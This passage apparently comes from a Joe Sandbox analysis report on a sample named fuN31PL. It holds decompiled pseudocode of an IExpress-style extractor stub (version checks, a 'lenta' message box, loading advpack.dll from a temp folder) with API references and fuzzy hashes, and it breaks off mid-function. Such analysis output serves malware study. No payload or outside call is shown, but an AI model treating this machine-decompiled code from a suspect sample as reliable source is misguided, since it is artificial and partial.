                                                                                                                                                                                                                                              											if(_t124 == 0) {
                                                                                                                                                                                                                                              												_t135 = _v436;
                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                              												_t99 = _t124[0x30];
                                                                                                                                                                                                                                              												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                                                                                                                                                                                              												__eflags = _t99 & 0x00000001;
                                                                                                                                                                                                                                              												if((_t99 & 0x00000001) == 0) {
                                                                                                                                                                                                                                              													asm("sbb ebx, ebx");
                                                                                                                                                                                                                                              													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                                                              													_t115 = 0x104;
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											__eflags =  *0x1a8a38 & 0x00000001;
                                                                                                                                                                                                                                              											if(( *0x1a8a38 & 0x00000001) != 0) {
                                                                                                                                                                                                                                              												L64:
                                                                                                                                                                                                                                              												_push(0);
                                                                                                                                                                                                                                              												_push(0x30);
                                                                                                                                                                                                                                              												_push(_v420);
                                                                                                                                                                                                                                              												_push("lenta");
                                                                                                                                                                                                                                              												goto L65;
                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                              												__eflags = _t135;
                                                                                                                                                                                                                                              												if(_t135 == 0) {
                                                                                                                                                                                                                                              													goto L64;
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              												__eflags =  *_t135;
                                                                                                                                                                                                                                              												if( *_t135 == 0) {
                                                                                                                                                                                                                                              													goto L64;
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              												MessageBeep(0);
                                                                                                                                                                                                                                              												_t94 = E001A681F(_t115);
                                                                                                                                                                                                                                              												__eflags = _t94;
                                                                                                                                                                                                                                              												if(_t94 == 0) {
                                                                                                                                                                                                                                              													L57:
                                                                                                                                                                                                                                              													0x180030 = 0x30;
                                                                                                                                                                                                                                              													L58:
                                                                                                                                                                                                                                              													_t97 = MessageBoxA(0, _t135, "lenta", 0x00180030 | _t115);
                                                                                                                                                                                                                                              													__eflags = _t115 & 0x00000004;
                                                                                                                                                                                                                                              													if((_t115 & 0x00000004) == 0) {
                                                                                                                                                                                                                                              														__eflags = _t115 & 0x00000001;
                                                                                                                                                                                                                                              														if((_t115 & 0x00000001) == 0) {
                                                                                                                                                                                                                                              															goto L66;
                                                                                                                                                                                                                                              														}
                                                                                                                                                                                                                                              														__eflags = _t97 - 1;
                                                                                                                                                                                                                                              														L62:
                                                                                                                                                                                                                                              														if(__eflags == 0) {
                                                                                                                                                                                                                                              															_t138 = 0;
                                                                                                                                                                                                                                              														}
                                                                                                                                                                                                                                              														goto L66;
                                                                                                                                                                                                                                              													}
                                                                                                                                                                                                                                              													__eflags = _t97 - 6;
                                                                                                                                                                                                                                              													goto L62;
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              												_t98 = E001A67C9(_t124, _t124);
                                                                                                                                                                                                                                              												__eflags = _t98;
                                                                                                                                                                                                                                              												if(_t98 == 0) {
                                                                                                                                                                                                                                              													goto L57;
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              												goto L58;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										__eflags = _t138 - 0x54c;
                                                                                                                                                                                                                                              										if(_t138 == 0x54c) {
                                                                                                                                                                                                                                              											goto L30;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										__eflags = _t138;
                                                                                                                                                                                                                                              										if(_t138 == 0) {
                                                                                                                                                                                                                                              											goto L66;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										_t135 = 0;
                                                                                                                                                                                                                                              										__eflags = 0;
                                                                                                                                                                                                                                              										goto L44;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									L37:
                                                                                                                                                                                                                                              									_t129 = _v432;
                                                                                                                                                                                                                                              									__eflags = _t129[0x7c];
                                                                                                                                                                                                                                              									if(_t129[0x7c] == 0) {
                                                                                                                                                                                                                                              										goto L66;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									_t133 =  &_v268;
                                                                                                                                                                                                                                              									_t104 = E001A28E8(_t129,  &_v268, _t129,  &_v428);
                                                                                                                                                                                                                                              									__eflags = _t104;
                                                                                                                                                                                                                                              									if(_t104 != 0) {
                                                                                                                                                                                                                                              										goto L66;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									_t135 = _v428;
                                                                                                                                                                                                                                              									_t133 = 0x54d;
                                                                                                                                                                                                                                              									_t138 = 0x54d;
                                                                                                                                                                                                                                              									goto L40;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								goto L33;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							__eflags = _t91;
                                                                                                                                                                                                                                              							if(_t91 > 0) {
                                                                                                                                                                                                                                              								goto L32;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							__eflags = _t123;
                                                                                                                                                                                                                                              							if(_t123 != 0) {
                                                                                                                                                                                                                                              								__eflags = _t91;
                                                                                                                                                                                                                                              								if(_t91 != 0) {
                                                                                                                                                                                                                                              									goto L37;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                                                                                                                                                                                              								L27:
                                                                                                                                                                                                                                              								if(__eflags <= 0) {
                                                                                                                                                                                                                                              									goto L37;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								L28:
                                                                                                                                                                                                                                              								__eflags = _t135;
                                                                                                                                                                                                                                              								if(_t135 == 0) {
                                                                                                                                                                                                                                              									goto L33;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								_t138 = 0x54c;
                                                                                                                                                                                                                                              								goto L30;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							__eflags = _t91;
                                                                                                                                                                                                                                              							_t107 = _v416.dwBuildNumber;
                                                                                                                                                                                                                                              							if(_t91 != 0) {
                                                                                                                                                                                                                                              								_t131 = _v424;
                                                                                                                                                                                                                                              								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                                                                                                                                                                                              								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                                                                                                                                                                                              									goto L37;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								goto L28;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t132 = _t107 & 0x0000ffff;
                                                                                                                                                                                                                                              							_t109 = _v424;
                                                                                                                                                                                                                                              							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                                                                                                                                                                                              							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                                                                                                                                                                                              								goto L28;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                                                                                                                                                                                              							goto L27;
                                                                                                                                                                                                                                              							L33:
                                                                                                                                                                                                                                              							_t135 =  &(_t135[1]);
                                                                                                                                                                                                                                              							_v428 = _t135;
                                                                                                                                                                                                                                              							_v420 = _t135;
                                                                                                                                                                                                                                              							__eflags = _t135 - 2;
                                                                                                                                                                                                                                              						} while (_t135 < 2);
                                                                                                                                                                                                                                              						goto L36;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					__eflags = _t77 == 1;
                                                                                                                                                                                                                                              					if(_t77 == 1) {
                                                                                                                                                                                                                                              						 *0x1a9a40 = _t119;
                                                                                                                                                                                                                                              						 *0x1a8184 = 1;
                                                                                                                                                                                                                                              						 *0x1a8180 = 1;
                                                                                                                                                                                                                                              						__eflags = _t133 - 3;
                                                                                                                                                                                                                                              						if(_t133 > 3) {
                                                                                                                                                                                                                                              							__eflags = _t133 - 5;
                                                                                                                                                                                                                                              							if(_t133 < 5) {
                                                                                                                                                                                                                                              								goto L14;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t113 = 3;
                                                                                                                                                                                                                                              							_t119 = _t113;
                                                                                                                                                                                                                                              							goto L13;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t119 = 1;
                                                                                                                                                                                                                                              						_t114 = 3;
                                                                                                                                                                                                                                              						 *0x1a9a40 = 1;
                                                                                                                                                                                                                                              						__eflags = _t133 - _t114;
                                                                                                                                                                                                                                              						if(__eflags < 0) {
                                                                                                                                                                                                                                              							L9:
                                                                                                                                                                                                                                              							 *0x1a8184 = _t135;
                                                                                                                                                                                                                                              							 *0x1a8180 = _t135;
                                                                                                                                                                                                                                              							goto L14;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						if(__eflags != 0) {
                                                                                                                                                                                                                                              							goto L14;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						__eflags = _v416.dwMinorVersion - 0x33;
                                                                                                                                                                                                                                              						if(_v416.dwMinorVersion >= 0x33) {
                                                                                                                                                                                                                                              							goto L14;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						goto L9;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t138 = 0x4ca;
                                                                                                                                                                                                                                              					goto L44;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t138 = 0x4b4;
                                                                                                                                                                                                                                              					L44:
                                                                                                                                                                                                                                              					_push(_t135);
                                                                                                                                                                                                                                              					_push(0x10);
                                                                                                                                                                                                                                              					_push(_t135);
                                                                                                                                                                                                                                              					_push(_t135);
                                                                                                                                                                                                                                              					L65:
                                                                                                                                                                                                                                              					_t133 = _t138;
                                                                                                                                                                                                                                              					E001A44B9(0, _t138);
                                                                                                                                                                                                                                              					L66:
                                                                                                                                                                                                                                              					return E001A6CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}





































                                                                                                                                                                                                                                              0x001a36f9
                                                                                                                                                                                                                                              0x001a3700
                                                                                                                                                                                                                                              0x001a370c
                                                                                                                                                                                                                                              0x001a3716
                                                                                                                                                                                                                                              0x001a3718
                                                                                                                                                                                                                                              0x001a371b
                                                                                                                                                                                                                                              0x001a3721
                                                                                                                                                                                                                                              0x001a372b
                                                                                                                                                                                                                                              0x001a373d
                                                                                                                                                                                                                                              0x001a3745
                                                                                                                                                                                                                                              0x001a3746
                                                                                                                                                                                                                                              0x001a3746
                                                                                                                                                                                                                                              0x001a3749
                                                                                                                                                                                                                                              0x001a37ab
                                                                                                                                                                                                                                              0x001a37ad
                                                                                                                                                                                                                                              0x001a37ae
                                                                                                                                                                                                                                              0x001a37b3
                                                                                                                                                                                                                                              0x001a37b8
                                                                                                                                                                                                                                              0x001a37b8
                                                                                                                                                                                                                                              0x001a37bf
                                                                                                                                                                                                                                              0x001a37bf
                                                                                                                                                                                                                                              0x001a37c5
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a37cb
                                                                                                                                                                                                                                              0x001a37cd
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a37d5
                                                                                                                                                                                                                                              0x001a37db
                                                                                                                                                                                                                                              0x001a37e8
                                                                                                                                                                                                                                              0x001a37ea
                                                                                                                                                                                                                                              0x001a37ea
                                                                                                                                                                                                                                              0x001a37ea
                                                                                                                                                                                                                                              0x001a37f0
                                                                                                                                                                                                                                              0x001a37f6
                                                                                                                                                                                                                                              0x001a3805
                                                                                                                                                                                                                                              0x001a3817
                                                                                                                                                                                                                                              0x001a382b
                                                                                                                                                                                                                                              0x001a3830
                                                                                                                                                                                                                                              0x001a3836
                                                                                                                                                                                                                                              0x001a383b
                                                                                                                                                                                                                                              0x001a383d
                                                                                                                                                                                                                                              0x001a38eb
                                                                                                                                                                                                                                              0x001a38eb
                                                                                                                                                                                                                                              0x001a38f2
                                                                                                                                                                                                                                              0x001a390c
                                                                                                                                                                                                                                              0x001a3911
                                                                                                                                                                                                                                              0x001a3911
                                                                                                                                                                                                                                              0x001a3913
                                                                                                                                                                                                                                              0x001a394d
                                                                                                                                                                                                                                              0x001a394d
                                                                                                                                                                                                                                              0x001a394f
                                                                                                                                                                                                                                              0x001a38a9
                                                                                                                                                                                                                                              0x001a38a9
                                                                                                                                                                                                                                              0x001a38b0
                                                                                                                                                                                                                                              0x001a38b2
                                                                                                                                                                                                                                              0x001a38b9
                                                                                                                                                                                                                                              0x001a38bb
                                                                                                                                                                                                                                              0x001a38c1
                                                                                                                                                                                                                                              0x001a3975
                                                                                                                                                                                                                                              0x001a38c7
                                                                                                                                                                                                                                              0x001a38de
                                                                                                                                                                                                                                              0x001a38e0
                                                                                                                                                                                                                                              0x001a38e0
                                                                                                                                                                                                                                              0x001a397b
                                                                                                                                                                                                                                              0x001a397d
                                                                                                                                                                                                                                              0x001a39a9
                                                                                                                                                                                                                                              0x001a397f
                                                                                                                                                                                                                                              0x001a3982
                                                                                                                                                                                                                                              0x001a398b
                                                                                                                                                                                                                                              0x001a398d
                                                                                                                                                                                                                                              0x001a398f
                                                                                                                                                                                                                                              0x001a399f
                                                                                                                                                                                                                                              0x001a39a1
                                                                                                                                                                                                                                              0x001a3991
                                                                                                                                                                                                                                              0x001a3991
                                                                                                                                                                                                                                              0x001a3991
                                                                                                                                                                                                                                              0x001a398f
                                                                                                                                                                                                                                              0x001a39af
                                                                                                                                                                                                                                              0x001a39b6
                                                                                                                                                                                                                                              0x001a3a0f
                                                                                                                                                                                                                                              0x001a3a0f
                                                                                                                                                                                                                                              0x001a3a11
                                                                                                                                                                                                                                              0x001a3a13
                                                                                                                                                                                                                                              0x001a3a19
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a39b8
                                                                                                                                                                                                                                              0x001a39b8
                                                                                                                                                                                                                                              0x001a39ba
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a39bc
                                                                                                                                                                                                                                              0x001a39bf
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a39c3
                                                                                                                                                                                                                                              0x001a39c9
                                                                                                                                                                                                                                              0x001a39ce
                                                                                                                                                                                                                                              0x001a39d0
                                                                                                                                                                                                                                              0x001a39e3
                                                                                                                                                                                                                                              0x001a39e5
                                                                                                                                                                                                                                              0x001a39e6
                                                                                                                                                                                                                                              0x001a39f1
                                                                                                                                                                                                                                              0x001a39f7
                                                                                                                                                                                                                                              0x001a39fa
                                                                                                                                                                                                                                              0x001a3a01
                                                                                                                                                                                                                                              0x001a3a04
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3a06
                                                                                                                                                                                                                                              0x001a3a09
                                                                                                                                                                                                                                              0x001a3a09
                                                                                                                                                                                                                                              0x001a3a0b
                                                                                                                                                                                                                                              0x001a3a0b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3a09
                                                                                                                                                                                                                                              0x001a39fc
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a39fc
                                                                                                                                                                                                                                              0x001a39d3
                                                                                                                                                                                                                                              0x001a39d8
                                                                                                                                                                                                                                              0x001a39da
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a39dc
                                                                                                                                                                                                                                              0x001a39b6
                                                                                                                                                                                                                                              0x001a3955
                                                                                                                                                                                                                                              0x001a395b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3961
                                                                                                                                                                                                                                              0x001a3963
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3969
                                                                                                                                                                                                                                              0x001a3969
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3969
                                                                                                                                                                                                                                              0x001a3915
                                                                                                                                                                                                                                              0x001a3915
                                                                                                                                                                                                                                              0x001a391b
                                                                                                                                                                                                                                              0x001a391f
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a392d
                                                                                                                                                                                                                                              0x001a3933
                                                                                                                                                                                                                                              0x001a3938
                                                                                                                                                                                                                                              0x001a393a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3940
                                                                                                                                                                                                                                              0x001a3946
                                                                                                                                                                                                                                              0x001a394b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a394b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a38f2
                                                                                                                                                                                                                                              0x001a3843
                                                                                                                                                                                                                                              0x001a3845
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a384b
                                                                                                                                                                                                                                              0x001a384d
                                                                                                                                                                                                                                              0x001a3883
                                                                                                                                                                                                                                              0x001a3885
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a389a
                                                                                                                                                                                                                                              0x001a389e
                                                                                                                                                                                                                                              0x001a389e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a38a0
                                                                                                                                                                                                                                              0x001a38a0
                                                                                                                                                                                                                                              0x001a38a2
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a38a4
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a38a4
                                                                                                                                                                                                                                              0x001a384f
                                                                                                                                                                                                                                              0x001a3851
                                                                                                                                                                                                                                              0x001a3857
                                                                                                                                                                                                                                              0x001a386e
                                                                                                                                                                                                                                              0x001a3877
                                                                                                                                                                                                                                              0x001a387b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3881
                                                                                                                                                                                                                                              0x001a3859
                                                                                                                                                                                                                                              0x001a385c
                                                                                                                                                                                                                                              0x001a3862
                                                                                                                                                                                                                                              0x001a3866
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3868
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a38f4
                                                                                                                                                                                                                                              0x001a38f4
                                                                                                                                                                                                                                              0x001a38f5
                                                                                                                                                                                                                                              0x001a38fb
                                                                                                                                                                                                                                              0x001a3901
                                                                                                                                                                                                                                              0x001a3901
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a390a
                                                                                                                                                                                                                                              0x001a374b
                                                                                                                                                                                                                                              0x001a374e
                                                                                                                                                                                                                                              0x001a375c
                                                                                                                                                                                                                                              0x001a3764
                                                                                                                                                                                                                                              0x001a3769
                                                                                                                                                                                                                                              0x001a376e
                                                                                                                                                                                                                                              0x001a3771
                                                                                                                                                                                                                                              0x001a379c
                                                                                                                                                                                                                                              0x001a379f
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a37a3
                                                                                                                                                                                                                                              0x001a37a4
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a37a4
                                                                                                                                                                                                                                              0x001a3773
                                                                                                                                                                                                                                              0x001a3777
                                                                                                                                                                                                                                              0x001a3778
                                                                                                                                                                                                                                              0x001a377f
                                                                                                                                                                                                                                              0x001a3781
                                                                                                                                                                                                                                              0x001a378e
                                                                                                                                                                                                                                              0x001a378e
                                                                                                                                                                                                                                              0x001a3794
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3794
                                                                                                                                                                                                                                              0x001a3783
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3785
                                                                                                                                                                                                                                              0x001a378c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a378c
                                                                                                                                                                                                                                              0x001a3750
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a372d
                                                                                                                                                                                                                                              0x001a372d
                                                                                                                                                                                                                                              0x001a396b
                                                                                                                                                                                                                                              0x001a396b
                                                                                                                                                                                                                                              0x001a396c
                                                                                                                                                                                                                                              0x001a396e
                                                                                                                                                                                                                                              0x001a396f
                                                                                                                                                                                                                                              0x001a3a1e
                                                                                                                                                                                                                                              0x001a3a1e
                                                                                                                                                                                                                                              0x001a3a22
                                                                                                                                                                                                                                              0x001a3a27
                                                                                                                                                                                                                                              0x001a3a3e
                                                                                                                                                                                                                                              0x001a3a3e

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 001A3723
                                                                                                                                                                                                                                              • MessageBeep.USER32(00000000), ref: 001A39C3
                                                                                                                                                                                                                                              • MessageBoxA.USER32(00000000,00000000,lenta,00000030), ref: 001A39F1
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Message$BeepVersion
                                                                                                                                                                                                                                              • String ID: 3$lenta
                                                                                                                                                                                                                                              • API String ID: 2519184315-4216304122
                                                                                                                                                                                                                                              • Opcode ID: 4d81d7a88b7c87c9ff4f8701349701c1ef15d898bdcbbabb39400ff6865233b5
                                                                                                                                                                                                                                              • Instruction ID: f7f2127d0e27c56b103caa78863d2a25e370559673d4bf7060ac4ab6714d9488
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4d81d7a88b7c87c9ff4f8701349701c1ef15d898bdcbbabb39400ff6865233b5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C91E4B9F012249FEB798F64CC817AAB7A0AB47304F1541AAF869D7251D7748F81CB41
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 83%
                                                                                                                                                                                                                                              			E001A6495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				signed int _t9;
                                                                                                                                                                                                                                              				signed char _t14;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t15;
                                                                                                                                                                                                                                              				void* _t18;
                                                                                                                                                                                                                                              				CHAR* _t26;
                                                                                                                                                                                                                                              				void* _t27;
                                                                                                                                                                                                                                              				signed int _t28;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t27 = __esi;
                                                                                                                                                                                                                                              				_t18 = __ebx;
                                                                                                                                                                                                                                              				_t9 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				_v8 = _t9 ^ _t28;
                                                                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                                                                              				E001A1781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                                                              				_t26 = "advpack.dll";
                                                                                                                                                                                                                                              				E001A658A( &_v268, 0x104, _t26);
                                                                                                                                                                                                                                              				_t14 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                              				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                                                                                                                                                                                              					_t15 = LoadLibraryA(_t26);
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E001A6CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                                                                                                                                                                                              			}













                                                                                                                                                                                                                                              0x001a6495
                                                                                                                                                                                                                                              0x001a6495
                                                                                                                                                                                                                                              0x001a64a0
                                                                                                                                                                                                                                              0x001a64a7
                                                                                                                                                                                                                                              0x001a64ab
                                                                                                                                                                                                                                              0x001a64bd
                                                                                                                                                                                                                                              0x001a64c2
                                                                                                                                                                                                                                              0x001a64d3
                                                                                                                                                                                                                                              0x001a64df
                                                                                                                                                                                                                                              0x001a64e8
                                                                                                                                                                                                                                              0x001a6502
                                                                                                                                                                                                                                              0x001a64ee
                                                                                                                                                                                                                                              0x001a64f9
                                                                                                                                                                                                                                              0x001a64f9
                                                                                                                                                                                                                                              0x001a6516

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 001A64DF
                                                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 001A64F9
                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 001A6502
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$advpack.dll
                                                                                                                                                                                                                                              • API String ID: 438848745-875882553
                                                                                                                                                                                                                                              • Opcode ID: c796f7f317f66af7f5776a90995021312bee837fb20cb7c29d7db6a24c43d23b
                                                                                                                                                                                                                                              • Instruction ID: d3f6359d624f71f4f1c8b41c544a67e16489ef3f47365b604a6500763d89242b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c796f7f317f66af7f5776a90995021312bee837fb20cb7c29d7db6a24c43d23b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7401D178A00108AFDB54EB64DC49AEA7778EB62320F900195F585921C0DF709ECACA51
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E001A28E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                                                                                                                                                                                              				void* _v8;
                                                                                                                                                                                                                                              				char* _v12;
                                                                                                                                                                                                                                              				intOrPtr _v16;
                                                                                                                                                                                                                                              				void* _v20;
                                                                                                                                                                                                                                              				intOrPtr _v24;
                                                                                                                                                                                                                                              				int _v28;
                                                                                                                                                                                                                                              				int _v32;
                                                                                                                                                                                                                                              				void* _v36;
                                                                                                                                                                                                                                              				int _v40;
                                                                                                                                                                                                                                              				void* _v44;
                                                                                                                                                                                                                                              				intOrPtr _v48;
                                                                                                                                                                                                                                              				intOrPtr _v52;
                                                                                                                                                                                                                                              				intOrPtr _v56;
                                                                                                                                                                                                                                              				intOrPtr _v60;
                                                                                                                                                                                                                                              				intOrPtr _v64;
                                                                                                                                                                                                                                              				long _t68;
                                                                                                                                                                                                                                              				void* _t70;
                                                                                                                                                                                                                                              				void* _t73;
                                                                                                                                                                                                                                              				void* _t79;
                                                                                                                                                                                                                                              				void* _t83;
                                                                                                                                                                                                                                              				void* _t87;
                                                                                                                                                                                                                                              				void* _t88;
                                                                                                                                                                                                                                              				intOrPtr _t93;
                                                                                                                                                                                                                                              				intOrPtr _t97;
